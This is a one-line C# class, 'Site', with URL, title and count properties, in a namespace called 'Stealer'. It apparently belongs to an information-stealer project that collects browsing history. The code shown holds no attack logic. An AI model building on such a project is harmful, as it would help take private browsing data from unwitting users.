namespace Stealer; public class Site : Item { public string sUrl { get; set; } public string sTitle { get; set; } public int iCount { get; set; } }